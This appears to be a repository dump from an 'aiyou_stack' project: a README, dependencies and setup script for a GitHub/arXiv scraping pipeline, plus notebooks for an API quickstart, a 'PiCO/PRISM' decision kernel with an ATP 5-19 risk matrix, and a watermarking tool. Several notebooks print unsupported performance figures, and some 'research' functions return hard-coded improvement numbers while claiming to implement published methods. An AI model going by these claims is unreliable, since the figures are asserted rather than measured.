Stack"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version="1.0.0"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description="Nightly Intel Pipeline - Ethical Intelligence Gathering"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component="ingestion-layer"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apps/aiyou_stack/aiyou-fastapi-services/nightly_intel_pipeline/GEMINI_ANALYSIS.md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**Comprehensive Analysis Framework for Intelligence Pipeline Evaluation**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the Gemini 2.0 Pro analysis prompt architecture for evaluating the Nightly Intel Pipeline's ingestion layer, adapted from the Judge 6 validation system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Ingestion Layer Analysis Prompt is designed to perform comprehensive pre-production analysis of the intelligence collection pipeline, focusing on **proactive data acquisition** rather than reactive validation. This shift reflects the pipeline's role as a foundational layer in the SHADOWTAGAI Core Stack™.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Distinction: Collection vs.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Judge 6 (Enforcement) | Gemini Ingestion Layer (Collection)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|--------|------------------------|-------------------------------------|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**Primary Role** | Reactive validator | Proactive collector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Hybrid Gemini+PyTorch | GKE CronJob Multi-Container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Metrics** | p99 latency ≤90ms | ~45 min/night runtime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Gates** | 98% coverage threshold | Quality gates on items, sources, costs, scores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 Pattern** | Calls services in 4 namespaces | Called by services in 4 namespaces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| Latency, throughput, block rate | Items/day, sources, cost/item, relevance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ATP 5-19, JR validation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API calls per validation | Monthly operational ~$77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FP/FN rates | Relevance, timeliness, completeness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Direct Replacements: Domain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replacements ensure the prompt stays focused on intelligence collection rather than enforcement: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**System Identity**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**From**: "Judge 6" references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**To**: "Gemini Ingestion Layer" for all system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Establishes clear domain context for Gemini 2.0 Pro's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**File References**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**From**: `judge_six.py` (single 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**To**: Pipeline documentation, architecture specs, flowcharts, config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Ingestion layers are distributed systems requiring broader analysis scope. Enables evaluation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Multi-container orchestration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Kubernetes CronJob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flow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**Performance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**From**: p99 ≤90ms (real-time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**To**: ~45 min/night runtime efficiency (batch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Nightly batch jobs optimize for total runtime, not per-request latency. This metric shift enables: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Parallelization opportunities in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Resource allocation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efficiency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**Quality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**From**: 98% code coverage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**To**: Multi-faceted quality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**Daily Items Ingested**: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**Source Diversity**: Coverage across YouTube, Twitter, arXiv, GitHub,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**Cost per Item**: Budget sustainability (~$77/month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**Relevance Scores**: JR Engine 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Prevents over-optimization for quantity at expense of usability in downstream SHADOWTAGAI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Context-Specific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(Hybrid Gemini+PyTorch)**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inference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On-the-fly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Synchronous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Ingestion Layer (GKE CronJob Multi-Container)**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Scheduled batch processing (2 AM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orchestration for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Fault tolerance and retry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optimization for variable data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Focus**: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 resource allocation (CPU/memory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Pod scheduling and node affinity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volume claims for data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Secret management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Pattern Flip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6**: Caller (invokes 4 namespace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→ Service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→ Service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→ Service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→ Service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 Layer**: Callee (invoked by 4 namespace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A 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B ├→ Ingestion Layer → Data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C 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D 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Implications**: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upstream trigger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downstream handoff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integration pain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backpressure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Unique Features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6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Compliance**: Risk level assessment (RA-1 through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Validation**: Purpose → Reasons → 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Blocking**: Immediate enforcement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Ingestion Layer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Crawling**: RFC 9309 robots.txt compliance, rate limiting,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Classification**: Strategic data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1: Executive review (score ≥85)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2: Auto-action approved (score ≥70)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3: Archive (score ≥50)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4: Low priority (&lt;50)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**Multi-Source Orchestration**: GitHub, arXiv, YouTube, Twitter, News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Emphasis**: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compliance verification (crawling standards)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allocation by tier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coverage gaps and biases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Sections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sections enhance depth and relevance for pre-production evaluation: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Ethical Compliance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Areas**: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**robots.txt Adherence**: RFC 9309 compliance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Domain-specific delays (3-10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**Circuit Breaker**: Failure threshold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**User-Agent Transparency**: Proper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**Crawl-delay Respect**: Server load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ETHICAL_COMPLIANCE_CHECKS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"robots_txt_parsing": "24-hour cache, honor disallow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"rate_limiting": "Adaptive throttling with ±30% jitter",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"circuit_breaker": "5 failures → 5-min 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"user_agent": "NightlyIntelBot/1.0 with contact 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"legal_risk": "Assess ban/lawsuit probability"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Distribution Goals**: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40% of daily items (repo discovery, code flattening)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**arXiv**: 25% (recent papers in cs.AI, cs.LG, stat.ML)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**YouTube**: 15% (video metadata, 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**Twitter**: 10% (trending discussions, announcements)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**News**: 10% (industry updates, regulatory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 (Gini coefficient)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Bias detection (over-reliance on single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gaps (missing critical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Expansion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Tier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Distribution**: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10-15% (high-value, executive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35-40% (actionable, auto-approved)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30-35% (archive, future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4: 15-20% (low priority, potential noise)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Questions**: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 the distribution healthy or skewed toward low-value data?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Tier 1 items truly executive-worthy?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Should tier thresholds be adjusted?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scoring criteria aligned with strategic goals?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**Briefing Quality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**Format**: Markdown with clear tier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**Timeliness**: Delivered by 6 AM local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**Completeness**: Executive summary + tier breakdowns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**Actionability**: Clear recommendations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**Readability**: Concise evaluations, no jargon overload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Focus**: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pipeline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Briefing generation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integration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Confidence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(Production System)**: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≥70%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Source**: Production telemetry, logs, real-world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High confidence achievable with empirical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Ingestion Layer (Pre-Production)**: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≥60%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Source**: Specifications, architecture docs, design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Lower bar acknowledges lack of production telemetry, reduces frustration with uncertainty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**Post-Production Adjustment**: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deployed to GKE with operational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target to 70-75%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Incorporate actual runtime data, cost metrics,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 prompt with real-world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full deployment, run Gemini 2.0 Pro on sample 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**Ethical Compliance Test**: Verify robots.txt parsing logic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**Architecture Evaluation**: Assess GKE resource allocation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**Cost Sensitivity**: Test reactions to cost spike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**Source Coverage**: Check multi-source gap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Prompt**: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Gemini Ingestion Layer architecture specifications focusing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Ethical crawling compliance (RFC 9309,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GKE resource optimization (CPU/memory, pod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Monthly cost sustainability (~$77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Multi-source coverage (GitHub, arXiv, YouTube, Twitter,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Tier classification distribution (target: 10-15% Tier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confidence scores (≥60%) for each analysis area.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Visualization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structured outputs from Gemini for better digestibility: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distribution breakdown (actual vs.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coverage matrix (items per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breakdown (API calls, storage,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**Charts** (described in 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efficiency trends (45-min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score distribution (JR Engine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radar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Edge Case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failure mode analysis in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**Source Outages**: What if GitHub API is down for 2 hours?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 Spikes**: How does system react to 3x item volume?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**Rate Limit Hits**: Circuit breaker activation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**Low-Quality Data**: All items score &lt;50 (Tier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**Kubernetes Failures**: Pod eviction, node downtime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Analysis Opportunity**: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Since Ingestion Layer and Judge 6 are complementary (collection → validation), a unified prompt could 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**Handoff Protocols**: How does Tier 2 data flow to Judge 6?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**Schema Compatibility**: Data format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Cascades**: Does ingestion latency affect validation?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**End-to-End Quality**: Combined coverage and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Integration Prompt**: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end-to-end data flow from Gemini Ingestion Layer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Judge 6 (validation):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handoff protocol (format, schema, timing)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Quality preservation (does scoring degrade?)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Latency budget (45-min ingestion + 90ms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Error propagation (how do ingestion failures affect validation?)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target: ≥65% (pre-production, multi-system)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GKE Deployment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Runtime Target: ~45 Minutes/Night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 Strategies**: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**Parallelization**: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Concurrent GitHub repo flattening (3-5 repos simultaneously)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Multi-threaded arXiv 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Asynchronous API calls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**Resource Allocation**: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**Persistent Storage**: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SQLite database on persistent volume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Cached robots.txt entries (24-hour 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Flattened repo storage for incremental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Model: ~$77/Month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API**: ~$0.50-2.00/run × 30 runs = $15-60/month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Compute**: ~$10-15/month (small node, nightly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~$2/month (100GB persistent disk)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**Sensitivity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- 2x item volume → ~$120/month (still economical)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- 3x volume → Consider cost caps or sampling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Focus: Relevance, Timeliness,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 Framework**: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"relevance":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"metric": "JR Engine score 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"target": "≥40% Tier 1-2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"measurement": "Purpose alignment + technical merit"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"timeliness":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"metric": "Data freshness",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"target": "≤7 days old (arXiv, GitHub)",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"measurement": "Publication date vs. ingestion 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"completeness":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"metric": "Source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"target": "All 5 sources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"measurement": "Items per source &gt; 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Iteration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**Phase 1: Local Testing**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ethical crawling on sample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Tune JR Engine scoring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Establish baseline tier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**Phase 2: GKE Deployment** (Next)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CronJob to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persistent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secret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45-min runtime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**Phase 3: Production Analysis**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Gemini 2.0 Pro analysis on production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Increase confidence target to 70%+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with Judge 6 for end-to-end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visualization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**Phase 4: Optimization** (Ongoing)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Address edge cases discovered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Expand source coverage (Reddit, Stack Overflow)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Fine-tune tier thresholds based on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Explore cost reduction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running Gemini analysis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Architecture diagrams available (GKE topology, data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Configuration files documented (config.py, Kubernetes manifests)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compliance specs detailed (robots.txt,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model validated (~$77/month sustainable)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classification logic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Multi-source coverage targets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Sample test data prepared (for dry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Quality**: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Confidence ≥60% on all major analysis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Actionable recommendations for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Edge case identification (≥5 failure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Cost sensitivity insights (2x/3x volume impacts)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Readiness**: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GKE resource specs optimized (based on Gemini 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Ethical compliance verified (no legal risks flagged)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Runtime target achievable (≤45 minutes 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Integration points validated (4 namespace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Ingestion Layer Analysis Prompt represents a strategic adaptation of the Judge 6 framework, tailored for **proactive intelligence collection** rather than reactive validation. By emphasizing ethical crawling, multi-source diversity, and tier-based prioritization, this prompt enables comprehensive pre-production evaluation of the SHADOWTAGAI Core Stack's foundational data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Takeaways**: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**Context matters**: Collection vs. enforcement requires different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**Confidence calibration**: Pre-prod specs justify lower bars (60% vs. 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**Holistic analysis**: Ethics + cost + quality &gt; raw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**Iterative refinement**: Post-deployment data will improve future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 execution** with Gemini 2.0 Pro. Awaiting production deployment data for Phase 3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for Gemini 2.0 Pro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Review**: Post-GKE deployment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apps/aiyou_stack/aiyou-fastapi-services/nightly_intel_pipeline/GEMINI_ANALYSIS.md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"""Nightly Intel Pipeline - Main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execution script for intelligence gathering and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utils.logging_setup import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pipeline import run_pipeline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description="Nightly Intel Pipeline - ATP 5-19 Compliant Intelligence Gathering",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formatter_class=argparse.RawDescriptionHelpFormatter,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epilog="""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with default settings (configured topics, 7 days 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with specific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main.py --topics mlops kubernetes ai-orchestration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with custom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main.py --days-back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Download PDFs from arXiv (increases run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main.py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Combine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main.py --topics llm mlops --days-back 30 --download-pdfs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Variables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GITHUB_TOKEN        - GitHub personal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ANTHROPIC_API_KEY   - Anthropic API key for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"--topics",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nargs="+",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help="GitHub topics to search for (overrides config)",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"--days-back",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help="Number of days to look back for papers/repos (default: 7)",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"--download-pdfs",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help="Download PDF files from arXiv (slower, uses more storage)",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parser.add_argument("--verbose", action="store_true", help="Enable verbose logging")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setup_logging()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os.getenv("GITHUB_TOKEN"):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print("ERROR: GITHUB_TOKEN environment variable not set.",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print("Create a GitHub personal access token and set it:",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export GITHUB_TOKEN='your_token_here'",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os.getenv("ANTHROPIC_API_KEY"):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print("ERROR: ANTHROPIC_API_KEY environment variable not set.",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print("Get your API key from https://console.anthropic.com/",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export ANTHROPIC_API_KEY='your_key_here'",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print("NIGHTLY INTEL PIPELINE - EXECUTION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briefing_file = run_pipeline(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github_topics=args.topics,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arxiv_days_back=args.days_back,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download_pdfs=args.download_pdfs,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print("PIPELINE EXECUTION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print(f"Briefing generated: {briefing_file}")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print("Next steps:")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1. Review the briefing: cat {briefing_file}")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2. Check the database: sqlite3 {Path(__file__).parent / 'storage' / 'intel_pipeline.db'}",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3. Examine flattened repos: ls {Path(__file__).parent / 'data' / 'repos'}")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4. Review paper metadata: ls {Path(__file__).parent / 'data' / 'papers'}")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print("PIPELINE EXECUTION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"""Nightly Intel Pipeline - Main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Coordinates ingestion, normalization, scoring, and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Enhanced with Gemini Normalization Layer (Step 1B) for structured IntelEvent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app.models.intel_event import IntelEvent, IntelEventBatch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Gemini normalizer for Step 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app.services.gemini_normalizer import GeminiNormalizer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.engines.jr_engine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.scrapers.arxiv_crawler import ArxivCrawler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.scrapers.federal_register_crawler import FederalRegisterCrawler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.scrapers.github_flattener import GitHubFlattener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.scrapers.industry_crawler import IndustryCrawler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.storage.briefing import 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.storage.database import IntelDatabase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.utils.logging_setup import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NightlyIntelPipeline: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pipeline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1A. Ingestion: Discover GitHub repos, arXiv papers, industry news, Federal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1B. Gemini Normalization: Transform raw docs → structured IntelEvent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JR Scoring: Evaluate IntelEvents using Purpose → Reasons →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Tier Classification: Classify into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Storage: Store raw docs + IntelEvents +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Briefing: Generate executive briefing with Gemini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enable_gemini_normalization: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setup_logging()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self.github_flattener = GitHubFlattener()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self.arxiv_crawler = ArxivCrawler()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self.industry_crawler = IndustryCrawler()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self.federal_register_crawler = FederalRegisterCrawler()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self.database = IntelDatabase()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self.briefing_generator = BriefingGenerator(db=self.database)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normalization layer (Step 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self.enable_gemini_normalization = enable_gemini_normalization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self.gemini_normalizer: GeminiNormalizer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self.intel_events: list[IntelEvent]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logger.info("pipeline_initialized", gemini_enabled=enable_gemini_normalization)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run_ingestion(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github_topics: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arxiv_days_back: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industry_days_back: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federal_register_days_back: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download_pdfs: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include_industry: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include_federal_register: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1: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 and download content from GitHub, arXiv, industry sources, and Federal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'repos', 'papers', 'industry', and 'federal_register'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logger.info("ingestion_started")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{"repos": [], "papers": [], "industry": [], "federal_register":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GitHub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logger.info("github_ingestion_started")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 for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 = self.github_flattener.search_repositories(topics=github_topics)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logger.info("github_repos_discovered", count=len(repos))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Flatten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flattened_files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repo in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flattened_file = self.github_flattener.flatten_repository(repo)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flattened_file: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flattened_files.append(flattened_file)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results["repos"] = flattened_files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logger.info("github_ingestion_complete", count=len(flattened_files))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logger.error("github_ingestion_error",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arXiv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logger.info("arxiv_ingestion_started")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self.arxiv_crawler.search_papers(days_back=arxiv_days_back)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logger.info("arxiv_papers_discovered", count=len(papers))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Download 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metadata_file = self.arxiv_crawler.download_paper(paper, download_pdf=download_pdfs)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metadata_file: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metadata_files.append(metadata_file)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results["papers"] = metadata_files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logger.info("arxiv_ingestion_complete", count=len(metadata_files))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logger.error("arxiv_ingestion_error",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Industry sources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include_industry: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logger.info("industry_ingestion_started")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Run async industry crawl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articles = asyncio.run(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self.industry_crawler.crawl_all_verticals(days_back=industry_days_back or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logger.info("industry_articles_discovered", count=len(articles))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Save articles and collect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article_files = self.industry_crawler.save_articles(articles)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results["industry"] = article_files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logger.info("industry_ingestion_complete", count=len(article_files))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logger.error("industry_ingestion_error",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Federal Register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include_federal_register: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logger.info("federal_register_ingestion_started")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Run async Federal Register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 = asyncio.run(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self.federal_register_crawler.fetch_documents(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days_back=federal_register_days_back or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logger.info("federal_register_documents_discovered", count=len(documents))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Save documents and collect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document_files = self.federal_register_crawler.save_documents(documents)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results["federal_register"] = document_files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logger.info("federal_register_ingestion_complete", count=len(document_files))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logger.error("federal_register_ingestion_error",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total_repos=len(results["repos"]),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total_papers=len(results["papers"]),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total_industry=len(results["industry"]),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total_federal_register=len(results["federal_register"]),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run_normalization(self, ingestion_results: dict[str, list[str]]) -&gt; IntelEventBatch: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1B: Gemini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 raw documents into structured IntelEvent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ingestion_results: Dict with file paths from run_ingestion()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IntelEventBatch containing all extracted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self.enable_gemini_normalization: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logger.info("gemini_normalization_skipped", reason="disabled")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IntelEventBatch(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batch_id="normalization_disabled",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total_raw_documents=0,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extraction_errors=0,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logger.info("gemini_normalization_started")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all documents for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file_path in ingestion_results.get("repos",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Path(file_path).read_text(encoding="utf-8")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"text":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"url": f"github://{Path(file_path).stem}",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"source_hint": "github_repo",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logger.error("doc_read_error", file=file_path,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file_path in ingestion_results.get("papers",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Path(file_path).read_text(encoding="utf-8")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"text":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"url": f"arxiv://{Path(file_path).stem}",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"source_hint": "academic",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logger.error("doc_read_error", file=file_path,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file_path in ingestion_results.get("industry",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Path(file_path).read_text(encoding="utf-8")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URL from content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 = f"industry://{Path(file_path).stem}"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"**URL:**"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 = content.split("**URL:**")[1].split("\n")[0].strip()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documents.append({"text": content, "url": url, "source_hint": "news"})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logger.error("doc_read_error", file=file_path,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file_path in ingestion_results.get("federal_register",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Path(file_path).read_text(encoding="utf-8")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URL from content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 = f"federal_register://{Path(file_path).stem}"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"**HTML URL:**"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 = content.split("**HTML URL:**")[1].split("\n")[0].strip()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documents.append({"text": content, "url": url, "source_hint": "regulation"})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logger.error("doc_read_error", file=file_path,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logger.info("documents_collected_for_normalization", count=len(documents))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IntelEventBatch(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batch_id="empty_batch",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total_raw_documents=0,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extraction_errors=0,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Gemini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GeminiNormalizer() as normalizer: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await normalizer.extract_batch(documents)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events for later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self.intel_events = batch.events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"gemini_normalization_complete",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total_events=len(batch.events),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errors=batch.extraction_errors,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success_rate=f"{batch.success_rate:.1%}",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run_scoring(self, ingestion_results: dict[str, list[str]]):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"""Steps 2-3: JR Scoring and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all ingested content and classify into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logger.info("scoring_started")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GitHub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repo_file in enumerate(ingestion_results["repos"],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"scoring_repo",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total=len(ingestion_results["repos"]),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file=repo_file,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Read flattened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Path(repo_file).read_text(encoding="utf-8")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repo name from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repo_name = Path(repo_file).stem.replace("_flattened", "").replace("_", "/",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Score with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self.jr_engine.score_github_repo(content, repo_name)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metadata from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 = self._extract_repo_metadata(content)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metadata["flattened_file_path"] = repo_file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self.database.store_repository_score(repo_name, score,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logger.error("repo_scoring_error", file=repo_file,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logger.info("repo_scoring_complete", count=len(ingestion_results["repos"]))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arXiv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paper_file in enumerate(ingestion_results["papers"],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"scoring_paper",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total=len(ingestion_results["papers"]),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file=paper_file,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Path(paper_file).read_text(encoding="utf-8")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paper ID from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paper_id = Path(paper_file).stem.replace("_metadata", "").replace("_", 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Score with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self.jr_engine.score_arxiv_paper(content, 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 = self._extract_paper_metadata(content)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metadata["metadata_file_path"] = paper_file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self.database.store_paper_score(paper_id, score,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logger.error("paper_scoring_error", file=paper_file,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logger.info("paper_scoring_complete", count=len(ingestion_results["papers"]))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industry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article_file in enumerate(ingestion_results.get("industry", []),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"scoring_article",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total=len(ingestion_results.get("industry",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file=article_file,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Read article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Path(article_file).read_text(encoding="utf-8")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article ID from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article_id = Path(article_file).stem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Score with JR Engine (use paper scoring for similar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self.jr_engine.score_arxiv_paper(content, article_id)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 = self._extract_article_metadata(content)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metadata["article_file_path"] = article_file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in database (using paper storage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self.database.store_paper_score(f"industry:{article_id}", score,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logger.error("article_scoring_error", file=article_file,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logger.info("article_scoring_complete", count=len(ingestion_results.get("industry", [])))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Federal Register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doc_file in enumerate(ingestion_results.get("federal_register", []),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"scoring_federal_document",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total=len(ingestion_results.get("federal_register",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file=doc_file,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Read document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Path(doc_file).read_text(encoding="utf-8")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document number from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doc_id = Path(doc_file).stem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Score with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self.jr_engine.score_arxiv_paper(content, doc_id)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 = self._extract_federal_register_metadata(content)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metadata["document_file_path"] = doc_file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self.database.store_paper_score(f"federal_register:{doc_id}", score,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logger.error("federal_document_scoring_error", file=doc_file,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"federal_register_scoring_complete",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count=len(ingestion_results.get("federal_register",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logger.info("scoring_complete")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run_scoring_with_intel_events(self, batch: IntelEventBatch):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IntelEvents using JR Engine with pre-extracted hints.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 scoring path that uses Gemini-extracted metadata and hints.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IntelEventBatch from run_normalization()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batch.events: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logger.info("intel_event_scoring_skipped", reason="no_events")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logger.info("intel_event_scoring_started", count=len(batch.events))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event in enumerate(batch.events,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"scoring_intel_event",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total=len(batch.events),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event_id=event.id,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source_type=event.source_type.value,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Score using enhanced IntelEvent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self.jr_engine.score_intel_event(event)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in database with event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"intel_event_id": event.id,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"source_url": event.source_url,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"source_type": event.source_type.value,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"jurisdiction": event.jurisdiction,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"effective_date": event.effective_date.isoformat()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event.effective_date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"topic_tags": event.topic_tags,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"risk_tags": [t.value for t in event.risk_tags],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"gemini_confidence": event.gemini_confidence,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"gemini_suggested_tier": event.jr_hints.suggested_tier,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"summary": event.summary,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paper storage for now (can be extended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self.database.store_paper_score(f"intel_event:{event.id}", score,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logger.error("intel_event_scoring_error", event_id=event.id,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logger.info("intel_event_scoring_complete", count=len(batch.events))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run_briefing(self)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5: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executive briefing from scored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briefing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logger.info("briefing_generation_started")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briefing_file = self.briefing_generator.generate_briefing()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logger.info("briefing_generation_complete", file=briefing_file)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run_full_pipeline(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github_topics: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arxiv_days_back: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download_pdfs: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use_gemini_scoring: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complete pipeline with Gemini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github_topics: Topics to search for GitHub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arxiv_days_back: Number of days to look back for arXiv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download_pdfs: Whether to download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use_gemini_scoring: Use IntelEvent-based scoring (vs raw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generated briefing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logger.info("pipeline_execution_started", gemini_enabled=self.enable_gemini_normalization)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1A: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ingestion_results = self.run_ingestion(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github_topics=github_topics,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arxiv_days_back=arxiv_days_back,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download_pdfs=download_pdfs,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1B: Gemini Normalization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intel_batch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self.enable_gemini_normalization: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intel_batch = asyncio.run(self.run_normalization(ingestion_results))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2-3: Scoring and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use_gemini_scoring and intel_batch and intel_batch.events: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enhanced IntelEvent scoring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self.run_scoring_with_intel_events(intel_batch)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legacy raw content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self.run_scoring(ingestion_results)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briefing_file = self.run_briefing()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"pipeline_execution_complete",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briefing_file=briefing_file,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intel_events_processed=len(intel_batch.events) if intel_batch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gemini_normalization_used=self.enable_gemini_normalization,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_extract_repo_metadata(self, content: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metadata from flattened repository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header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content.split("\n")[:10]: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line.startswith("# Stars:"):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metadata["stars"] = int(line.split(":", 1)[1].strip())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line.startswith("# Description:"):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metadata["description"]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line.startswith("# URL:"):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metadata["url"]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line.startswith("# Topics:"):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topics_str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metadata["topics"] = [t.strip() for t in topics_str.split(",")]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line.startswith("# Language:"):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metadata["language"]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line.startswith("# Last Updated:"):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metadata["updated_at"]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_extract_paper_metadata(self, content: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metadata from paper markdown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markdown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line in enumerate(lines):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line.startswith("# ") and i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metadata["title"] = line[2:].strip()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line.startswith("**Authors:**"):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authors_str = line.split("**Authors:**")[1].strip()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metadata["authors"] = [a.strip() for a in authors_str.split(",")]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line.startswith("**Published:**"):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metadata["published_date"] = line.split("**Published:**")[1].strip()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line.startswith("**Categories:**"):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categories_str = line.split("**Categories:**")[1].strip()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metadata["categories"] = [c.strip() for c in categories_str.split(",")]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line.startswith("**arXiv ID:**"):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metadata["arxiv_id"] = line.split("**arXiv ID:**")[1].strip()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line.startswith("**PDF URL:**"):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metadata["pdf_url"] = line.split("**PDF URL:**")[1].strip()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line.startswith("## Primary Category") and i + 1 &lt; len(lines):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metadata["primary_category"] = lines[i + 2].strip()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"## Abstract"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abstract_section = content.split("## Abstract")[1].split("##", maxsplit=1)[0]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metadata["abstract"] = abstract_section.strip()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_extract_article_metadata(self, content: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metadata from industry article markdown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markdown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line in enumerate(lines):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line.startswith("# ") and i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metadata["title"] = line[2:].strip()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line.startswith("**Source:**"):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metadata["source"] = line.split("**Source:**")[1].strip()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line.startswith("**URL:**"):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metadata["url"] = line.split("**URL:**")[1].strip()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line.startswith("**Published:**"):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metadata["published_date"] = line.split("**Published:**")[1].strip()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line.startswith("**Vertical:**"):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metadata["vertical"] = line.split("**Vertical:**")[1].strip()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line.startswith("**Relevance Score:**"):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metadata["relevance_score"] =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line.split("**Relevance Score:**")[1].strip(),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"## Summary"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summary_section = content.split("## Summary")[1].split("##", maxsplit=1)[0]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metadata["summary"] = summary_section.strip()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_extract_federal_register_metadata(self, content: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metadata from Federal Register document markdown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markdown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line in enumerate(lines):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line.startswith("# ") and i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metadata["title"] = line[2:].strip()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line.startswith("**Document Number:**"):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metadata["document_number"] = line.split("**Document Number:**")[1].strip()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line.startswith("**Type:**"):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metadata["document_type"] = line.split("**Type:**")[1].strip()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line.startswith("**Publication Date:**"):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metadata["publication_date"] = line.split("**Publication Date:**")[1].strip()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line.startswith("**Agency:**"):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metadata["agency"] = line.split("**Agency:**")[1].strip()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line.startswith("**PNKLN Vertical:**"):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metadata["vertical"] = line.split("**PNKLN Vertical:**")[1].strip()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line.startswith("**Relevance Score:**"):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metadata["relevance_score"] =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line.split("**Relevance Score:**")[1].strip(),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line.startswith("**Significant:**"):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metadata["significant"] = line.split("**Significant:**")[1].strip() ==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line.startswith("**HTML URL:**"):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metadata["html_url"] = line.split("**HTML URL:**")[1].strip()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line.startswith("**PDF URL:**"):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metadata["pdf_url"] = line.split("**PDF URL:**")[1].strip()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line.startswith("**Effective Date:**"):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metadata["effective_date"] = line.split("**Effective Date:**")[1].strip()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line.startswith("**Comment Deadline:**"):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metadata["comment_deadline"] = line.split("**Comment Deadline:**")[1].strip()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line.startswith("**Docket IDs:**"):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metadata["docket_ids"] = line.split("**Docket IDs:**")[1].strip()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line.startswith("**CFR References:**"):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metadata["cfr_references"] = line.split("**CFR References:**")[1].strip()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"## Abstract"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abstract_section = content.split("## Abstract")[1].split("##", maxsplit=1)[0]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metadata["abstract"] = abstract_section.strip()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github_topics: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arxiv_days_back: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download_pdfs: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enable_gemini_normalization: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use_gemini_scoring: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run the full pipeline with Gemini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Full pipeline with Gemini normalization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briefing_file = run_pipeline(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github_topics=["mlops", "kubernetes"],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arxiv_days_back=7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Legacy mode without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briefing_file = run_pipeline(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github_topics=["mlops"],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enable_gemini_normalization=False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NightlyIntelPipeline(enable_gemini_normalization=enable_gemini_normalization)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pipeline.run_full_pipeline(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github_topics=github_topics,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arxiv_days_back=arxiv_days_back,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download_pdfs=download_pdfs,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use_gemini_scoring=use_gemini_scoring,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apps/aiyou_stack/aiyou-fastapi-services/nightly_intel_pipeline/QUICKSTART.md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Start Guide -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your intelligence pipeline running in 5 minutes!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Personal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 (30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automated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you created a virtual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(2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`.env`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your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GITHUB_TOKEN=ghp_xxxxxxxxxxxx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ANTHROPIC_API_KEY=sk-ant-xxxxxxxxxxxx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(Optional) Customize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`config.py` to change GitHub topics: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"target_topics":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"mlops",           # Your topics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"ai-orchestration"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 It! (2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mlops llm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Look back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--days-back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PDFs (slower)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Happens?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pipeline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**Discover** (30-60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Search GitHub for repos matching your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Search arXiv for recent AI/ML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**Flatten** (1-2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Download and flatten repository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Extract paper metadata and abstracts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**Score** (2-5 minutes, depends on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Evaluate each item using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Apply JR Engine (Purpose → Reasons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Calculate composite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**Classify** (instant)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1: Executive review (score ≥ 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2: Auto-action approved (score ≥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3: Archive (score ≥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4: Low priority (&lt;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**Brief** (instant)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markdown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Store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View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Read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latest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-lt data/briefings/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data/briefings/briefing_YYYYMMDD_HHMMSS.md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sqlite&gt; SELECT repo_name, total_score, tier FROM repositories ORDER BY total_score DESC LIMIT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sqlite&gt; SELECT title, total_score, tier FROM papers ORDER BY total_score DESC LIMIT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sqlite&gt; .quit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Explore Raw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Flattened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data/repos/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data/papers/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Intelligence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2025-11-15 02:30:15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Intelligence Items:** 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Repositories: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Papers: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 (Executive Review):** 5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Repositories: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Papers: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 (Auto-Action):** 18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Repositories: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Papers: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1: Executive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feast-dev/feast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https://github.com/feast-dev/feast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87.5 | **ATP Risk:** RA-2 | **Stars:** 5234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 Alignment (92): Feature store directly supports MLOps best practices...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Merit (88): Well-architected, production-grade implementation...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Adoption Potential (85): Strong community, used by major tech companies...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 (85): Moderate complexity, well-documented...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**Concerns (Brakes):**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infrastructure investment (Redis, databases)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Learning curve for distributed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Nightly (Linux/Mac)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crontab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at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 * * * cd /path/to/nightly_intel_pipeline &amp;&amp; /usr/bin/python3 main.py &gt;&gt; logs/cron.log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Nightly (Windows)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```powershell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schtasks /create /tn "NightlyIntel" /tr "python C:\path\to\main.py" /sc daily /st 02:00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 Run (typical):**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API: Free (within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API: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API: ~$0.50-2.00 (depends on content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(nightly runs):**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~$15-60 for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"GITHUB_TOKEN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GITHUB_TOKEN='your_token_here'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"Rate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 1 hour or reduce `max_repos_per_topic` in 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"Database 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Close any open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storage/intel_pipeline.db  # Resets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--upgrade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**Customize** `config.py` for your specific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**Review** first briefing to validate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**Tune** tier thresholds and scoring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**Schedule** for nightly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**Integrate** with your workflow (Slack, email,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logs: `cat logs/pipeline.log`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config: `cat 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 docs: `cat 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**You're ready!** Run `python main.py` and get your first intelligence briefing.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apps/aiyou_stack/aiyou-fastapi-services/nightly_intel_pipeline/QUICKSTART.md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Compliant Intelligence Gathering System for Local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ethical, automated intelligence pipeline that discovers, scores, and delivers briefings on AI/MLOps technologies from GitHub and arXiv.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Web Scraping (ATP 5-19 RA-1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RFC 9309 compliant robots.txt parsing (24-hour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Domain-specific rate limiting with adaptive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pattern for sustained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Crawl-delay respect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Multi-Source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Repositories**: Topic-based discovery, star filtering, code flattening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**arXiv Papers**: Category and keyword search,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Scoring (Purpose → Reasons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 Alignment: MLOps/AI strategic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Merit: Implementation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Adoption Potential: Community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Assessment: ATP 5-19 risk levels (RA-1 through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1**: Executive review required (score ≥ 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2**: Auto-action approved (score ≥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3**: Archive for later (score ≥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4**: Low priority (score &lt;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Storage &amp;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database for scored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briefings with executive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Personal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 Key (for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Navigate to the pipeline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GITHUB_TOKEN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the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`GITHUB_TOKEN`: GitHub personal access token ([Create one here](https://github.com/settings/tokens))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`ANTHROPIC_API_KEY`: Anthropic API key ([Get one here](https://console.anthropic.com/))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topics, categories, and thresholds in `config.py`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default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Specify custom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mlops kubernetes llm ai-governance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Look back further in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--days-back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arXiv PDFs (slower, more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llm mlops --days-back 14 --download-pdfs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Programmatic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pipeline import run_pipeline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briefing_file = run_pipeline(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github_topics=["mlops", "kubernetes"],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arxiv_days_back=7,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download_pdfs=False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print(f"Briefing generated: {briefing_file}")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Module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repository flattening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scrapers.github_flattener import GitHubFlattener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flattener = GitHubFlattener()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 = flattener.search_repositories(topics=["mlops"])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flattened_files = flattener.flatten_repositories(repos)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arXiv paper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scrapers.arxiv_crawler import ArxivCrawler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crawler = ArxivCrawler()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papers = crawler.search_papers(days_back=7)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metadata_files = crawler.download_papers(papers)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Engine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engines.jr_engine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engine.score_content(content, "github_repo", "owner/repo")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storage.briefing import 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generator = BriefingGenerator()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briefing_file = generator.generate_briefing()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`config.py` to customize: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Scraping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SCRAPING_ETHICS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"robots_txt":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"cache_ttl": 86400,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"respect_crawl_delay":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"honor_disallow":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"default_delay": 3.0,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"youtube":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"twitter":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domain-specific delays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"target_topics":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"machine-learning",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"ai-orchestration",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add more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"min_stars":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"max_repos_per_topic":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arXiv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"cs.AI",  # Artificial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"cs.LG",  #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add more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"search_terms":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add more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JR_ENGINE_CONFIG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"scoring_criteria":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"purpose_alignment":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"technical_merit":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"adoption_potential":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"risk_assessment":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"tier_thresholds":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"tier_1": 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"tier_2": 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"tier_3":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nightly_intel_pipeline/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    # Configuration (includes GKE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pipeline.py               # Main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 # CLI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# Container image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GEMINI_ANALYSIS.md        # Gemini 2.0 Pro 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scrapers/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ethical_scraper.py    # ATP 5-19 compliant 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github_flattener.py   # GitHub repo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arxiv_crawler.py      # arXiv paper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engines/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jr_engine.py          # JR scoring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storage/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database.py           # 